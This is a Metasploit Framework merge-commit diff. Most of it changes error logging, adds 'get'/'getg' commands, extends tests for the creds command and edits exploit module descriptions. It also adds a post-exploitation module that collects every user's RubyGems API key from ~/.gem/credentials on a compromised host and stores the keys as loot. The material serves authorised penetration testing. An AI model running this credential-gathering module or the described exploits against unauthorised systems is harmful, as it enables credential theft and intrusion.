Merge remote-tracking branch 'upstream/master' into bug/4634/blank-username

Conflicts:
	lib/msf/ui/console/command_dispatcher/db.rb
	spec/lib/msf/ui/console/command_dispatcher/db_spec.rb

features/commands/help.feature

@@ -19,6 +19,8 @@ Feature: Help command
           connect       Communicate with a host
           edit          Edit the current module with $VISUAL or $EDITOR
           exit          Exit the console
+          get           Gets the value of a variable
+          getg          Gets the value of a global variable
           go_pro        Launch Metasploit web GUI
           grep          Grep the output of another command
           help          Help menu

lib/msf/base/simple/auxiliary.rb

@@ -151,19 +151,17 @@ protected
     rescue ::Exception => e
       mod.error = e
       mod.print_error("Auxiliary failed: #{e.class} #{e}")
-      elog("Auxiliary failed: #{e.class} #{e}", 'core', LEV_0)
+      if(e.class.to_s != 'Msf::OptionValidateError')
-
-      if e.kind_of?(Msf::OptionValidateError)
-        dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
-      else
         mod.print_error("Call stack:")
         e.backtrace.each do |line|
           break if line =~ /lib.msf.base.simple.auxiliary.rb/
           mod.print_error("  #{line}")
         end
-        elog("Call stack:\n#{$@.join("\n")}", 'core', LEV_0)
       end
 
+      elog("Auxiliary failed: #{e.class} #{e}", 'core', LEV_0)
+      dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
+
       mod.cleanup
 
       return
@@ -184,3 +182,4 @@ end
 
 end
 end
+

lib/msf/base/simple/exploit.rb

@@ -147,17 +147,7 @@ module Exploit
       exploit.error = e
       exploit.print_error("Exploit failed: #{e}")
       elog("Exploit failed (#{exploit.refname}): #{e}", 'core', LEV_0)
-
-      if e.kind_of?(Msf::OptionValidateError)
       dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
-      else
-        exploit.print_error("Call stack:")
-        e.backtrace.each do |line|
-          break if line =~ /lib.msf.base.simple.exploit.rb/
-          exploit.print_error("  #{line}")
-        end
-        elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
-      end
     end
 
     return driver.session if driver
@@ -209,3 +199,4 @@ end
 
 end
 end
+

lib/msf/base/simple/post.rb

@@ -121,19 +121,17 @@ protected
     rescue ::Exception => e
       mod.error = e
       mod.print_error("Post failed: #{e.class} #{e}")
-      elog("Post failed: #{e.class} #{e}", 'core', LEV_0)
+      if(e.class.to_s != 'Msf::OptionValidateError')
-
-      if e.kind_of?(Msf::OptionValidateError)
-        dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
-      else
         mod.print_error("Call stack:")
         e.backtrace.each do |line|
           break if line =~ /lib.msf.base.simple.post.rb/
           mod.print_error("  #{line}")
         end
-        elog("Call stack:\n#{$@.join("\n")}", 'core', LEV_0)
       end
 
+      elog("Post failed: #{e.class} #{e}", 'core', LEV_0)
+      dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
+
       mod.cleanup
 
       return
@@ -156,3 +154,4 @@ end
 
 end
 end
+

lib/msf/core/exploit_driver.rb

@@ -271,20 +271,14 @@ protected
           exploit.fail_reason = Msf::Exploit::Failure::Unknown
         end
 
-        elog("Exploit failed (#{exploit.refname}): #{msg}", 'core', LEV_0)
-
         if exploit.fail_reason == Msf::Exploit::Failure::Unknown
           exploit.print_error("Exploit failed: #{msg}")
-          exploit.print_error("Call stack:")
-          e.backtrace.each do |line|
-            break if line =~ /lib.msf.base.core.exploit_driver.rb/
-            exploit.print_error("  #{line}")
-          end
-          elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
         else
           exploit.print_error("Exploit failed [#{exploit.fail_reason}]: #{msg}")
-          dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
         end
+
+        elog("Exploit failed (#{exploit.refname}): #{msg}", 'core', LEV_0)
+        dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
       end
 
       # Record the error to various places
@@ -335,3 +329,4 @@ protected
 end
 
 end
+

lib/msf/core/rpc/v10/rpc_core.rb

@@ -15,6 +15,11 @@ class RPC_Core < RPC_Base
     self.service.stop
   end
 
+  def rpc_getg(var)
+    val = framework.datastore[var]
+    { var.to_s => val.to_s }
+  end
+
   def rpc_setg(var, val)
     framework.datastore[var] = val
     { "result" => "success" }

lib/msf/ui/console/command_dispatcher/auxiliary.rb

@@ -120,17 +120,12 @@ class Auxiliary
       print_error("Auxiliary interrupted by the console user")
     rescue ::Exception => e
       print_error("Auxiliary failed: #{e.class} #{e}")
-      elog("Auxiliary failed: #{e.class} #{e}", 'core', LEV_0)
+      if(e.class.to_s != 'Msf::OptionValidateError')
-
-      if e.kind_of?(Msf::OptionValidateError)
-        dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
-      else
         print_error("Call stack:")
         e.backtrace.each do |line|
           break if line =~ /lib.msf.base.simple/
           print_error("  #{line}")
         end
-        elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
       end
 
       return false
@@ -157,3 +152,4 @@ class Auxiliary
 end
 
 end end end end
+

lib/msf/ui/console/command_dispatcher/core.rb

@@ -115,6 +115,8 @@ class Core
       "color"    => "Toggle color",
       "exit"     => "Exit the console",
       "edit"     => "Edit the current module with $VISUAL or $EDITOR",
+      "get"      => "Gets the value of a variable",
+      "getg"     => "Gets the value of a global variable",
       "go_pro"   => "Launch Metasploit web GUI",
       "grep"     => "Grep the output of another command",
       "help"     => "Help menu",
@@ -2298,6 +2300,81 @@ class Core
     return tabs
   end
 
+ def cmd_get_help
+    print_line "Usage: get var1 [var2 ...]"
+    print_line
+    print_line "The get command is used to get the value of one or more variables."
+    print_line
+  end
+
+  #
+  # Gets a value if it's been set.
+  #
+  def cmd_get(*args)
+
+    # Figure out if these are global variables
+    global = false
+
+    if (args[0] == '-g')
+      args.shift
+      global = true
+    end
+
+    # No arguments?  No cookie.
+    if args.empty?
+      global ? cmd_getg_help : cmd_get_help
+      return false
+    end
+
+    # Determine which data store we're operating on
+    if (active_module && !global)
+      datastore = active_module.datastore
+    else
+      datastore = framework.datastore
+    end
+
+    args.each { |var| print_line("#{var} => #{datastore[var]}") }
+  end
+
+  #
+  # Tab completion for the get command
+  #
+  # @param str [String] the string currently being typed before tab was hit
+  # @param words [Array<String>] the previously completed words on the command line.  words is always
+  # at least 1 when tab completion has reached this stage since the command itself has been completed
+
+  def cmd_get_tabs(str, words)
+    datastore = active_module ? active_module.datastore : self.framework.datastore
+    datastore.keys
+  end
+
+  def cmd_getg_help
+    print_line "Usage: getg var1 [var2 ...]"
+    print_line
+    print_line "Exactly like get -g, get global variables"
+    print_line
+  end
+
+  #
+  # Gets variables in the global data store.
+  #
+  def cmd_getg(*args)
+    args.unshift('-g')
+
+    cmd_get(*args)
+  end
+
+  #
+  # Tab completion for the getg command
+  #
+  # @param str [String] the string currently being typed before tab was hit
+  # @param words [Array<String>] the previously completed words on the command line.  words is always
+  # at least 1 when tab completion has reached this stage since the command itself has been completed
+
+  def cmd_getg_tabs(str, words)
+    self.framework.datastore.keys
+  end
+
   def cmd_unset_help
     print_line "Usage: unset [-g] var1 var2 var3 ..."
     print_line

lib/msf/ui/console/command_dispatcher/db.rb

@@ -887,6 +887,16 @@ class Db
 
       query.find_each do |core|
 
+        # Exclude non-blank username creds if that's what we're after
+        if user && user.empty? && !(core.public && core.public.username.blank?)
+          next
+        end
+
+        # Exclude non-blank password creds if that's what we're after
+        if pass && pass.empty? && !(core.private && core.private.data.blank?)
+          next
+        end
+
         if core.logins.empty?
 
           tbl << [

lib/msf/ui/console/command_dispatcher/exploit.rb

@@ -121,18 +121,12 @@ class Exploit
       raise $!
     rescue ::Exception => e
       print_error("Exploit exception (#{mod.refname}): #{e.class} #{e}")
-
+      if(e.class.to_s != 'Msf::OptionValidateError')
-      elog("Exploit exception (#{mod.refname}): #{e.class} #{e}", 'core', LEV_0)
-
-      if e.kind_of?(Msf::OptionValidateError)
-        dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
-      else
         print_error("Call stack:")
         e.backtrace.each do |line|
           break if line =~ /lib.msf.base.simple/
           print_error("  #{line}")
         end
-        elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
       end
     end
 

lib/msf/ui/console/command_dispatcher/post.rb

@@ -122,18 +122,12 @@ class Post
       print_error("Post interrupted by the console user")
     rescue ::Exception => e
       print_error("Post failed: #{e.class} #{e}")
-
+      if (e.class.to_s != 'Msf::OptionValidateError')
-      elog("Post failed: #{e.class} #{e}", 'core', LEV_0)
-
-      if e.kind_of?(Msf::OptionValidateError)
-        dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
-      else
         print_error("Call stack:")
         e.backtrace.each do |line|
           break if line =~ /lib.msf.base.simple/
           print_error("  #{line}")
         end
-        elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
       end
 
       return false
@@ -160,3 +154,4 @@ class Post
 end
 
 end end end end
+

modules/auxiliary/gather/huawei_wifi_info.rb

@@ -55,16 +55,16 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
       'Name'           => "Huawei Datacard Information Disclosure Vulnerability",
       'Description'    => %q{
-        This module exploits an un-authenticated information disclosure vulnerability in Huawei
+        This module exploits an unauthenticated information disclosure vulnerability in Huawei
         SOHO routers. The module will gather information by accessing the /api pages where
         authentication is not required, allowing configuration changes as well as information
-        disclosure including any stored SMS.
+        disclosure, including any stored SMS.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Jimson K James.',
+          'Jimson K James',
-          '<tomsmaily[at]aczire.com>', # Msf module
+          'Tom James <tomsmaily[at]aczire.com>', # Msf module
         ],
       'References'     =>
         [
@@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
 
   end
 
-  #Gather basic router information
+  # Gather basic router information
   def run
     get_router_info
     print_line('')
@@ -168,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary
         'uri'     => '/api/wlan/basic-settings',
       })
 
-    #check whether we got any response from server and proceed.
+    # check whether we got any response from server and proceed.
     unless is_target?(res)
       return nil
     end
@@ -273,19 +273,19 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def is_target?(res)
-    #check whether we got any response from server and proceed.
+    # check whether we got any response from server and proceed.
     unless res
       print_error("#{peer} - Failed to get any response from server")
       return false
     end
 
-    #Is it a HTTP OK
+    # Is it a HTTP OK
     unless res.code == 200
       print_error("#{peer} - Did not get HTTP 200, URL was not found")
       return false
     end
 
-    #Check to verify server reported is a Huawei router
+    # Check to verify server reported is a Huawei router
     unless res.headers['Server'].match(/IPWEBS\/1.4.0/i)
       print_error("#{peer} - Target doesn't seem to be a Huawei router")
       return false

modules/auxiliary/gather/konica_minolta_pwd_extract.rb

@@ -14,10 +14,11 @@ class Metasploit3 < Msf::Auxiliary
   def initialize(info = {})
     super(update_info(info,
       'Name'        => 'Konica Minolta Password Extractor',
-      'Description' => %q(
+      'Description' => %q{
           This module will extract FTP and SMB account usernames and passwords
-        from Konica Minolta mfp devices. Tested models include: C224, C280,
+          from Konica Minolta multifunction printer (MFP) devices. Tested models include
-        283, C353, C360, 363, 420, C452,C452, C452, C454e, C554 ),
+          C224, C280, 283, C353, C360, 363, 420, C452, C452, C452, C454e, and C554.
+        },
       'Author'      =>
         [
           'Deral "Percentx" Heiland',

modules/auxiliary/gather/mcafee_epo_xxe.rb

@@ -18,15 +18,15 @@ class Metasploit3 < Msf::Auxiliary
       off of the filesystem. This properties file contains an encrypted password that is set during
       installation. What is interesting about this password is that it is set as the same password
       as the database 'sa' user and of the admin user created during installation. This password
-      is encrypted with a static key, and is encrypted using a weak cipher at that (ECB). By default,
+      is encrypted with a static key, and is encrypted using a weak cipher (ECB). By default,
-      if installed with a local SQL Server instance, the SQL server is listening on all interfaces.
+      if installed with a local SQL Server instance, the SQL Server is listening on all interfaces.
 
       Recovering this password allows an attacker to potentially authenticate as the 'sa' SQL Server
       user in order to achieve remote command execution with permissions of the database process. If
-      the administrator has no changed the password for the initially created account since installation,
+      the administrator has not changed the password for the initially created account since installation,
-      the attacker also now has the password for this account. By default, 'admin' is recommended.
+      the attacker will have the password for this account. By default, 'admin' is recommended.
 
-      Any user account can be used to exploit this, all that is needed is a pair of credentials.
+      Any user account can be used to exploit this, all that is needed is a valid credential.
 
       The most data that can be successfully retrieved is 255 characters due to length restrictions
       on the field used to perform the XXE attack.

modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb

@@ -19,7 +19,7 @@ class Metasploit4 < Msf::Auxiliary
         'Misfortune Cookie' vulnerability which affects Allegro Software
         Rompager versions before 4.34 and can allow attackers to authenticate
         to the HTTP service as an administrator without providing valid
-        credentials, however more specifics are not yet known.
+        credentials.
       ),
       'Author' => [
         'Jon Hart <jon_hart[at]rapid7.com>', # metasploit module

modules/auxiliary/voip/cisco_cucdm_call_forward.rb

@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
       'Description' => %q{
         The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
         (CDM) 10 does not properly implement access control, which allows remote attackers to
-        modify user information. This module exploits the vulnerability for configure unauthorized
+        modify user information. This module exploits the vulnerability to configure unauthorized
         call forwarding.
       },
       'Author'      => 'fozavci',

modules/auxiliary/voip/cisco_cucdm_speed_dials.rb

@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary
         The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
         (CDM), before version 10, doesn't implement access control properly, which allows remote
         attackers to modify user information. This module exploits the vulnerability to make
-        unauthorized speeddial manipulations.
+        unauthorized speeddial entity manipulations.
       },
       'Author'        => 'fozavci',
       'References'    =>

modules/exploits/linux/local/desktop_privilege_escalation.rb

@@ -20,11 +20,11 @@ class Metasploit4 < Msf::Exploit::Local
       'Description'   => %q{
         This module steals the user password of an administrative user on a desktop Linux system
         when it is entered for unlocking the screen or for doing administrative actions using
-        policykit. Then it escalates to root privileges using sudo and the stolen user password.
+        PolicyKit. Then, it escalates to root privileges using sudo and the stolen user password.
         It exploits the design weakness that there is no trusted channel for transferring the
         password from the keyboard to the actual password verificatition against the shadow file
         (which is running as root since /etc/shadow is only readable to the root user). Both
-        screensavers (xscreensaver/gnome-screensaver) and policykit use a component running under
+        screensavers (xscreensaver/gnome-screensaver) and PolicyKit use a component running under
         the current user account to query for the password and then pass it to a setuid-root binary
         to do the password verification. Therefore, it is possible to inject a password stealer
         after compromising the user account. Since sudo requires only the user password (and not

modules/exploits/multi/http/manageengine_auth_upload.rb

@@ -17,10 +17,10 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,
         AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts
         the upload does not handle correctly '../' sequences, which can be abused to write
-        in the file system. Authentication is needed to exploit this vulnerability, but this module
+        to the file system. Authentication is needed to exploit this vulnerability, but this module
         will attempt to login using the default credentials for the administrator and guest
-        accounts. Alternatively you can provide a pre-authenticated cookie or a username / password
+        accounts. Alternatively, you can provide a pre-authenticated cookie or a username / password.
-        combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All
+        For IT360 targets, enter the RPORT of the ServiceDesk instance (usually 8400). All
         versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,
         SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this
         module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been

modules/exploits/multi/http/pandora_upload_exec.rb

@@ -13,9 +13,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
+      'Name'           => "Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
       'Description'    => %q{
-        This module exploits an authentication bypass vulnerability in Pandora v3.1 as
+        This module exploits an authentication bypass vulnerability in Pandora FMS v3.1 as
         disclosed by Juan Galiana Lara. It also integrates with the built-in pandora
         upload which allows a user to upload arbitrary files to the '/images/' directory.
 

modules/exploits/unix/webapp/wp_symposium_shell_upload.rb

@@ -15,17 +15,15 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(
       info,
       'Name'            => 'WordPress WP Symposium 14.11 Shell Upload',
-      'Description'     => %q{WP Symposium Plugin for WordPress contains a
+      'Description'     => %q{
-                              flaw that allows a remote attacker to execute
+          WP Symposium Plugin for WordPress contains a flaw that allows a remote attacker
-                              arbitrary PHP code. This flaw exists because the
+          to execute arbitrary PHP code. This flaw exists because the
-                              /wp-symposium/server/file_upload_form.php script
+          /wp-symposium/server/file_upload_form.php script does not properly verify or
-                              does not properly verify or sanitize
+          sanitize user-uploaded files. By uploading a .php file, the remote system will
-                              user-uploaded files. By uploading a .php file,
+          place the file in a user-accessible path. Making a direct request to the
-                              the remote system will place the file in a
+          uploaded file will allow the attacker to execute the script with the privileges
-                              user-accessible path. Making a direct request to
+          of the web server.
-                              the uploaded file will allow the attacker to
+        },
-                              execute the script with the privileges of the
-                              web server.},
       'License'         => MSF_LICENSE,
       'Author'          =>
         [

modules/exploits/windows/browser/getgodm_http_response_bof.rb

@@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
           This module exploits a stack-based buffer overflow vulnerability in
         GetGo Download Manager version 4.9.0.1982 and earlier, caused by an
         overly long HTTP response header.
+
         By persuading the victim to download a file from a malicious server, a
         remote attacker could execute arbitrary code on the system or cause
         the application to crash. This module has been tested successfully on

modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb

@@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'    => %q{
           This module exploits a stack-based buffer overflow vulnerability in
         BulletProof FTP Client 2010, caused by an overly long hostname.
+
         By persuading the victim to open a specially-crafted .BPS file, a
         remote attacker could execute arbitrary code on the system or cause
         the application to crash. This module has been tested successfully on

modules/exploits/windows/fileformat/iftp_schedule_bof.rb

@@ -19,6 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'    => %q{
           This module exploits a stack-based buffer overflow vulnerability in
         i-Ftp v2.20, caused by a long time value set for scheduled download.
+
         By persuading the victim to place a specially-crafted Schedule.xml file
         in the i-FTP folder, a remote attacker could execute arbitrary code on
         the system or cause the application to crash. This module has been

modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb

@@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'          => 'Lexmark MarkVision Enterprise Arbitrary File Upload',
       'Description'   => %q{
-        This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1.
+        This module exploits a code execution flaw in Lexmark MarkVision Enterprise before version 2.1.
-        A directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated
+        A directory traversal vulnerability in the GfdFileUploadServlet servlet allows an unauthenticated
         attacker to upload arbitrary files, including arbitrary JSP code. This module has been
         tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.
       },

modules/exploits/windows/mysql/mysql_start_up.rb

@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
         specifically against Windows MySQL servers. This module abuses the FILE
         privilege to write a payload to Microsoft's All Users Start Up directory
         which will execute every time a user logs in. The default All Users Start
-        Up directory used by the module is Windows 7 friendly.
+        Up directory used by the module is present on Windows 7.
       },
       'Author'         =>
         [

modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb

@@ -24,7 +24,7 @@ module Metasploit3
       'Description'   => 'Listen for a connection. First, the port will need to be knocked from
                           the IP defined in KHOST. This IP will work as an authentication method
                           (you can spoof it with tools like hping). After that you could get your
-                          shellcode from any IP. The socket will appear as "closed" helping us to
+                          shellcode from any IP. The socket will appear as "closed," thus helping to
                           hide the shellcode',
       'Author'        =>
         [

modules/payloads/stagers/windows/bind_hidden_tcp.rb

@@ -21,7 +21,7 @@ module Metasploit3
   def initialize(info = {})
     super(merge_info(info,
       'Name'          => 'Hidden Bind TCP Stager',
-      'Description'   => 'Listen for a connection from a hidden port and spawn a command shell to the allowed host',
+      'Description'   => 'Listen for a connection from a hidden port and spawn a command shell to the allowed host.',
       'Author'        =>
         [
           'hdm',        # original payload module (stager bind_tcp)

modules/post/multi/gather/rubygems_api_key.rb

@@ -0,0 +1,67 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'yaml'
+
+class Metasploit4 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => 'Multi Gather RubyGems API Key',
+      'Description'  => %q{
+        This module obtains a user's RubyGems API key from ~/.gem/credentials.
+      },
+      'Author'       => [
+        'Jonathan Claudius <jclaudius[at]trustwave.com>',
+        'Brandon Myers <bmyers[at]trustwave.com>'
+      ],
+      'Platform'     => %w{bsd linux osx unix},
+      'SessionTypes' => %w{shell},
+      'License'      => MSF_LICENSE
+    ))
+  end
+
+  def run
+    print_status('Finding ~/.gem/credentials')
+    paths = enum_user_directories.map { |d| d + '/.gem/credentials' }
+    paths = paths.select { |f| file?(f) }
+
+    if paths.empty?
+      print_error('No users found with a ~/.gem/credentials file')
+      return
+    end
+
+    download_key(paths)
+  end
+
+  def download_key(paths)
+    print_status("Looting #{paths.count} files")
+    paths.each do |path|
+      path.chomp!
+      next if ['.', '..'].include?(path)
+
+      rubygems_api_key = YAML.load(read_file(path))[:rubygems_api_key]
+      next unless rubygems_api_key
+
+      print_good("Found a RubyGems API key: #{rubygems_api_key}")
+
+      loot_path = store_loot(
+        'rubygems.apikey',
+        'text/plain',
+        session,
+        rubygems_api_key,
+        'rubygems_api_key.txt',
+        'RubyGems API key'
+      )
+
+      print_good("RubyGems API key stored in #{loot_path}")
+    end
+  end
+
+end

spec/lib/msf/core/rpc/v10/rpc_core_spec.rb

@@ -0,0 +1,28 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'msf/core/rpc/v10/rpc_base'
+require 'msf/core/rpc/v10/rpc_core'
+require 'msf/core/rpc/v10/service'
+
+describe Msf::RPC::RPC_Core do
+  include_context 'Msf::Simple::Framework'
+
+  let(:service) do
+    Msf::RPC::Service.new(framework)
+  end
+
+  let(:core) do
+    Msf::RPC::RPC_Core.new(service)
+  end
+
+  describe '#rpc_getg' do
+    it 'should show an empty value if the variable is unset' do
+      expect(core.rpc_getg('FOO')).to eq({'FOO' => ''})
+    end
+    it 'should show the correct value if the variable is set' do
+      core.rpc_setg('FOO', 'BAR')
+      expect(core.rpc_getg('FOO')).to eq({'FOO' => 'BAR'})
+    end
+  end
+end

spec/lib/msf/ui/console/command_dispatcher/core_spec.rb

@@ -95,4 +95,72 @@ describe Msf::Ui::Console::CommandDispatcher::Core do
       end
     end
   end
+
+  it { is_expected.to respond_to :cmd_get }
+  it { is_expected.to respond_to :cmd_getg }
+
+  def set_and_test_variable(name, framework_value, module_value, framework_re, module_re)
+    # set the current module
+    allow(core).to receive(:active_module).and_return(mod)
+    # always assume set variables validate (largely irrelevant because ours are random)
+    allow(driver).to receive(:on_variable_set).and_return(true)
+    # the specified global value
+    core.cmd_setg(name, framework_value) if framework_value
+    # set the specified local value
+    core.cmd_set(name, module_value) if module_value
+
+    # test the global value if specified
+    if framework_re
+      @output = []
+      core.cmd_getg(name)
+      @output.join.should =~ framework_re
+    end
+
+    # test the local value if specified
+    if module_re
+      @output = []
+      core.cmd_get(name)
+      @output.join.should =~ module_re
+    end
+  end
+
+  describe "#cmd_get and #cmd_getg" do
+    describe "without arguments" do
+      it "should show the correct help message" do
+        core.cmd_get
+        @output.join.should =~ /Usage: get /
+        @output = []
+        core.cmd_getg
+        @output.join.should =~ /Usage: getg /
+      end
+    end
+
+    describe "with arguments" do
+      let(:name) { ::Rex::Text.rand_text_alpha(10).upcase }
+
+      context "with an active module" do
+        let(:mod) do
+          mod = ::Msf::Module.new
+          mod.send(:initialize, {})
+          mod
+        end
+
+        it "should show no value if not set in the framework or module" do
+          set_and_test_variable(name, nil, nil, /^#{name} => $/, /^#{name} => $/)
+        end
+
+        it "should show the correct value when only the module has this variable" do
+          set_and_test_variable(name, nil, 'MODULE', /^#{name} => $/, /^#{name} => MODULE$/)
+        end
+
+        it "should show the correct value when only the framework has this variable" do
+          set_and_test_variable(name, 'FRAMEWORK', nil, /^#{name} => FRAMEWORK$/, /^#{name} => $/)
+        end
+
+        it "should show the correct value when both the module and the framework have this variable" do
+          set_and_test_variable(name, 'FRAMEWORK', 'MODULE', /^#{name} => FRAMEWORK$/, /^#{name} => MODULE$/)
+        end
+      end
+    end
+  end
 end

spec/lib/msf/ui/console/command_dispatcher/db_spec.rb

@@ -65,8 +65,134 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
   it { is_expected.to respond_to :set_rhosts_from_addrs }
 
   describe "#cmd_creds" do
-    let(:username) { "username" }
+    let(:username)            { "thisuser" }
-    let(:password) { "password" }
+    let(:password)            { "thispass" }
+
+    describe "-u" do
+      let(:nomatch_username)    { "thatuser" }
+      let(:nomatch_password)    { "thatpass" }
+      let(:blank_username)      { "" }
+      let(:blank_password)      { "" }
+      let(:nonblank_username)   { "nonblank_user" }
+      let(:nonblank_password)   { "nonblank_pass" }
+      before(:each) do
+        priv = FactoryGirl.create(:metasploit_credential_password, data: password)
+        pub = FactoryGirl.create(:metasploit_credential_username, username: username)
+        core = FactoryGirl.create(:metasploit_credential_core,
+                                  origin: FactoryGirl.create(:metasploit_credential_origin_import),
+                                  private: priv,
+                                  public: pub,
+                                  realm: nil,
+                                  workspace: framework.db.workspace)
+        nonblank_priv = FactoryGirl.create(:metasploit_credential_password, data: nonblank_password)
+        blank_pub = FactoryGirl.create(:metasploit_credential_blank_username)
+        core = FactoryGirl.create(:metasploit_credential_core,
+                                  origin: FactoryGirl.create(:metasploit_credential_origin_import),
+                                  private: nonblank_priv,
+                                  public: blank_pub,
+                                  realm: nil,
+                                  workspace: framework.db.workspace)
+        nonblank_pub = FactoryGirl.create(:metasploit_credential_username, username: nonblank_username)
+        blank_priv = FactoryGirl.create(:metasploit_credential_password, data: blank_password)
+        core = FactoryGirl.create(:metasploit_credential_core,
+                                  origin: FactoryGirl.create(:metasploit_credential_origin_import),
+                                  private: blank_priv,
+                                  public: nonblank_pub,
+                                  realm: nil,
+                                  workspace: framework.db.workspace)
+      end
+      context "when the credential is present" do
+        it "should show a user that matches the given expression" do
+          db.cmd_creds("-u", username)
+          @output.should =~ [
+            "Credentials",
+            "===========",
+            "",
+            "host  service  public    private   realm  private_type",
+            "----  -------  ------    -------   -----  ------------",
+            "               thisuser  thispass         Password",
+          ]
+        end
+
+        it 'should match a regular expression' do
+          subject.cmd_creds("-u", "^#{username}$")
+          @output.should =~
+          [
+            "Credentials",
+            "===========",
+            "",
+            "host  service  public    private   realm  private_type",
+            "----  -------  ------    -------   -----  ------------",
+            "               thisuser  thispass         Password",
+          ]
+        end
+
+        it 'should return nothing for a non-matching regular expression' do
+          subject.cmd_creds("-u", "^#{nomatch_username}$")
+          @output.should =~
+          [
+            "Credentials",
+            "===========",
+            "",
+            "host  service  public  private  realm  private_type",
+            "----  -------  ------  -------  -----  ------------",
+          ]
+        end
+
+        context "and when the username is blank" do
+          it "should show a user that matches the given expression" do
+            db.cmd_creds("-u", blank_username )
+            @output.should =~ [
+              "Credentials",
+              "===========",
+              "",
+              "host  service  public  private        realm  private_type",
+              "----  -------  ------  -------        -----  ------------",
+              "                       nonblank_pass         Password"
+            ]
+          end
+        end
+        context "and when the password is blank" do
+          it "should show a user that matches the given expression" do
+            db.cmd_creds("-P", blank_password )
+            @output.should =~ [
+              "Credentials",
+              "===========",
+              "",
+              "host  service  public         private  realm  private_type",
+              "----  -------  ------         -------  -----  ------------",
+              "               nonblank_user                  Password"
+            ]
+          end
+        end
+      end
+      context "when the credential is absent" do
+        context "due to a nonmatching username" do
+          it "should return a blank set" do
+            db.cmd_creds("-u", nomatch_username)
+            @output.should =~ [
+              "===========",
+              "Credentials",
+              "",
+              "----  -------  ------  -------  -----  ------------",
+              "host  service  public  private  realm  private_type"
+            ]
+          end
+        end
+        context "due to a nonmatching password" do
+          it "should return a blank set" do
+            db.cmd_creds("-P", nomatch_password)
+            @output.should =~ [
+              "===========",
+              "Credentials",
+              "",
+              "----  -------  ------  -------  -----  ------------",
+              "host  service  public  private  realm  private_type"
+            ]
+          end
+        end
+      end
+    end
 
     describe "add-password" do
       context "when no core exists" do
@@ -94,44 +220,7 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
         end
       end
     end
-    describe "-u" do
-      before(:each) do
-        priv = FactoryGirl.create(:metasploit_credential_password, data: password)
-        pub = FactoryGirl.create(:metasploit_credential_username, username: username)
-        FactoryGirl.create(:metasploit_credential_core,
-                           private: priv,
-                           public: pub,
-                           realm: nil,
-                           workspace: framework.db.workspace)
-      end
 
-      it 'should match a regular expression' do
-        subject.cmd_creds("-u", "^#{username}$")
-        @output.should =~
-         [
-          "Credentials",
-          "===========",
-          "",
-          "host  service  public    private   realm  private_type",
-          "----  -------  ------    -------   -----  ------------",
-          "               username  password         Password",
-         ]
-      end
-
-      it 'should return nothing for a non-matching regular expression' do
-        subject.cmd_creds("-u", "^$")
-        @output.should =~
-         [
-          "Credentials",
-          "===========",
-          "",
-          "host  service  public  private  realm  private_type",
-          "----  -------  ------  -------  -----  ------------",
-         ]
-      end
-
-
-    end
   end
 
   describe "#cmd_db_export" do